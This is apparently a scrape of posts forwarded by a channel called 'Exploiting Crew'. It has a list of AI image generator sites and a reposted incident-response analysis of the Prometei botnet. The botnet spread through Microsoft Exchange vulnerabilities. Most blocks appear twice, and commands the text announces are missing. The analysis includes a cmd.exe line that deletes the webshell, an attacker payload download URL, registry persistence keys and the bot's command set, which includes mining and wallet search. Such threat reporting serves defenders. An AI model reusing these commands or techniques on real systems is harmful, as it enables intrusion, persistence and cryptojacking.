Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Top Ai Image Generators:
General AI Art Tools
1. DALL·E
7 [https://openai.com/dall-e](https://openai.com/dall-e)
2. MidJourney
[https://www.midjourney.com](https://www.midjourney.com)
3. Stable Diffusion (DreamStudio)
[https://dreamstudio.ai](https://dreamstudio.ai)
4. DeepAI Image Generator
[https://deepai.org/machine-learning-model/text2img](https://deepai.org/machine-learning-model/text2img)
5. Runway ML
[https://runwayml.com](https://runwayml.com)
### Free and Easy-to-Use Generators
6. Craiyon (formerly DALL·E Mini)
[https://craiyon.com](https://craiyon.com)
7. Artbreeder
[https://www.artbreeder.com](https://www.artbreeder.com)
8. Fotor AI Art Generator
[https://www.fotor.com/features/ai-image-generator](https://www.fotor.com/features/ai-image-generator)
9. Picsart AI Generator
[https://picsart.com/ai-image-generator](https://picsart.com/ai-image-generator)
10. NightCafe Studio
[https://creator.nightcafe.studio](https://creator.nightcafe.studio)
### Specialized AI Tools
11. Avatarify AI (For Portraits)
[https://www.avatarify.ai](https://www.avatarify.ai)
12. Deep Dream Generator (Surreal Images)
[https://deepdreamgenerator.com](https://deepdreamgenerator.com)
13. Deep Nostalgia (Photo Animation)
[https://www.myheritage.com/deep-nostalgia](https://www.myheritage.com/deep-nostalgia)
14. ArtSmart.ai
[https://artsmart.ai](https://artsmart.ai)
15. RunDiffusion (Customizable)
[https://www.rundiffusion.com](https://www.rundiffusion.com)
General AI Art Tools
1. DALL·E
7 [https://openai.com/dall-e](https://openai.com/dall-e)
2. MidJourney
[https://www.midjourney.com](https://www.midjourney.com)
3. Stable Diffusion (DreamStudio)
[https://dreamstudio.ai](https://dreamstudio.ai)
4. DeepAI Image Generator
[https://deepai.org/machine-learning-model/text2img](https://deepai.org/machine-learning-model/text2img)
5. Runway ML
[https://runwayml.com](https://runwayml.com)
### Free and Easy-to-Use Generators
6. Craiyon (formerly DALL·E Mini)
[https://craiyon.com](https://craiyon.com)
7. Artbreeder
[https://www.artbreeder.com](https://www.artbreeder.com)
8. Fotor AI Art Generator
[https://www.fotor.com/features/ai-image-generator](https://www.fotor.com/features/ai-image-generator)
9. Picsart AI Generator
[https://picsart.com/ai-image-generator](https://picsart.com/ai-image-generator)
10. NightCafe Studio
[https://creator.nightcafe.studio](https://creator.nightcafe.studio)
### Specialized AI Tools
11. Avatarify AI (For Portraits)
[https://www.avatarify.ai](https://www.avatarify.ai)
12. Deep Dream Generator (Surreal Images)
[https://deepdreamgenerator.com](https://deepdreamgenerator.com)
13. Deep Nostalgia (Photo Animation)
[https://www.myheritage.com/deep-nostalgia](https://www.myheritage.com/deep-nostalgia)
14. ArtSmart.ai
[https://artsmart.ai](https://artsmart.ai)
15. RunDiffusion (Customizable)
[https://www.rundiffusion.com](https://www.rundiffusion.com)
Openai
DALL·E 3
DALL·E 3 understands significantly more nuance and detail than our previous systems, allowing you to easily translate your ideas into exceptionally accurate images.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Exploitation of the Microsoft Exchange Vulnerability:
During the IR investigation, the Nocturnus Team was able to identify the initial compromise vector, in which the attackers exploited the recently discovered vulnerabilities in Microsoft Exchange server, which allowed them to perform remote code execution by exploiting the following CVEs: CVE-2021-27065 and CVE-2021-26858.
The attackers used this vulnerability to install and execute the China Chopper webshell via the following commands:
During the IR investigation, the Nocturnus Team was able to identify the initial compromise vector, in which the attackers exploited the recently discovered vulnerabilities in Microsoft Exchange server, which allowed them to perform remote code execution by exploiting the following CVEs: CVE-2021-27065 and CVE-2021-26858.
The attackers used this vulnerability to install and execute the China Chopper webshell via the following commands:
Forwarded from Exploiting Crew (Pr1vAt3)
Once the attackers gained access to the network, they deleted the .aspx webshell file to cover their tracks:
cmd.exe /c del "C:\Program Files\Microsoft\Exchange Server\V15\\frontend\httpproxy\owa\auth\<file_name>.aspx"
cmd.exe /c del "C:\Program Files\Microsoft\Exchange Server\V15\\frontend\httpproxy\owa\auth\<file_name>.aspx"
Forwarded from Exploiting Crew (Pr1vAt3)
Using the webshell, the attackers launched a PowerShell that was then used to download a payload from the following URL:
http://178.21.164[.]68/dwn.php?b64=1&d=nethost64C.exe&B=_AMD64,<machine_name>
The payload is then saved as C:\windows\zsvc.exe and executed. This is the start of the Prometei botnet execution:
http://178.21.164[.]68/dwn.php?b64=1&d=nethost64C.exe&B=_AMD64,<machine_name>
The payload is then saved as C:\windows\zsvc.exe and executed. This is the start of the Prometei botnet execution:
Forwarded from Exploiting Crew (Pr1vAt3)
The Prometei Botnet :
When the first module of the botnet, zsvc.exe, is executed, it starts to “prepare the ground” for the other modules:
It copies itself into C:\Windows with the name “sqhost.exe”
It uses Netsh commands to add a firewall rule that will allow sqhost.exe to create connections over HTTP
It checks if there is a registry key named “UPlugPlay”, and if present it deletes it
It sets a registry key for persistence as HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay with the image path and command line c:\windows\sqhost.exe Dcomsvc
It creates several registry keys under SOFTWARE\Microsoft\Fax\ and SOFTWARE\Intel\support\ with the names MachineKeyId, EncryptedMachineKeyId and CommId, for later use by the different components for C2 communication.
Sqhost.exe:
Sqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands. Sqhost.exe is able to parse the prometei.cgi file from 4 different hardcoded command and control servers. The file contains the command to be executed on the machine. The commands can be used as “stand-alone” native OS commands (cmd commands, WMI, etc.) or can be used to interact with the other modules of the malware located under C:\Windows\dell
When the first module of the botnet, zsvc.exe, is executed, it starts to “prepare the ground” for the other modules:
It copies itself into C:\Windows with the name “sqhost.exe”
It uses Netsh commands to add a firewall rule that will allow sqhost.exe to create connections over HTTP
It checks if there is a registry key named “UPlugPlay”, and if present it deletes it
It sets a registry key for persistence as HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay with the image path and command line c:\windows\sqhost.exe Dcomsvc
It creates several registry keys under SOFTWARE\Microsoft\Fax\ and SOFTWARE\Intel\support\ with the names MachineKeyId, EncryptedMachineKeyId and CommId, for later use by the different components for C2 communication.
Sqhost.exe:
Sqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands. Sqhost.exe is able to parse the prometei.cgi file from 4 different hardcoded command and control servers. The file contains the command to be executed on the machine. The commands can be used as “stand-alone” native OS commands (cmd commands, WMI, etc.) or can be used to interact with the other modules of the malware located under C:\Windows\dell
Forwarded from Exploiting Crew (Pr1vAt3)
Sqhost supports the following commands:
Call - Execute a program or a file
Start_mining - launch SearchIndexer.exe (the miner) with the file C:\windows\dell\Desktop.dat as its parameters
Start_mining1 - request C:\windows\dell\Desktop.dat from the C2, and then launch SearchIndexer.exe (the miner) with the file C:\windows\dell\Desktop.dat as its parameters
Stop_mining - runs cmd.exe with command: “/c taskkill -f -im SearchIndexer.exe”
Wget - download a file
Xwget - download a file, save it, and use XOR to decrypt it
Quit - terminate the bot execution using TerminateProcess
Quit2 - terminate the bot execution without using TerminateProcess
Sysinfo - collect information about the machine (using native APIs and WMIC)
Exec - execute a command
Ver - return the bot version
Enc - get/set the RC4 encryption key
Extip - return the bot's external IP address
Chkport - check if a specific port is open
Search - search for files by name (potentially crypto currency wallets)
Set_timeout - set a period of time for connecting to C2 server
Touch - open a file
Touch_internal - edit a file with a single byte to change access times
Touch_stop - close a file
Update - update the bot version
Set_Autoexec2 - set an automatic execution
Set_Autoexec1 - set an automatic execution
Set_cc1 - set a C2 server
Set_cc0 - set a C2 server
Call - Execute a program or a file
Start_mining - launch SearchIndexer.exe (the miner) with the file C:\windows\dell\Desktop.dat as its parameters
Start_mining1 - request C:\windows\dell\Desktop.dat from the C2, and then launch SearchIndexer.exe (the miner) with the file C:\windows\dell\Desktop.dat as its parameters
Stop_mining - runs cmd.exe with command: “/c taskkill -f -im SearchIndexer.exe”
Wget - download a file
Xwget - download a file, save it, and use XOR to decrypt it
Quit - terminate the bot execution using TerminateProcess
Quit2 - terminate the bot execution without using TerminateProcess
Sysinfo - collect information about the machine (using native APIs and WMIC)
Exec - execute a command
Ver - return the bot version
Enc - get/set the RC4 encryption key
Extip - return the bot's external IP address
Chkport - check if a specific port is open
Search - search for files by name (potentially crypto currency wallets)
Set_timeout - set a period of time for connecting to C2 server
Touch - open a file
Touch_internal - edit a file with a single byte to change access times
Touch_stop - close a file
Update - update the bot version
Set_Autoexec2 - set an automatic execution
Set_Autoexec1 - set an automatic execution
Set_cc1 - set a C2 server
Set_cc0 - set a C2 server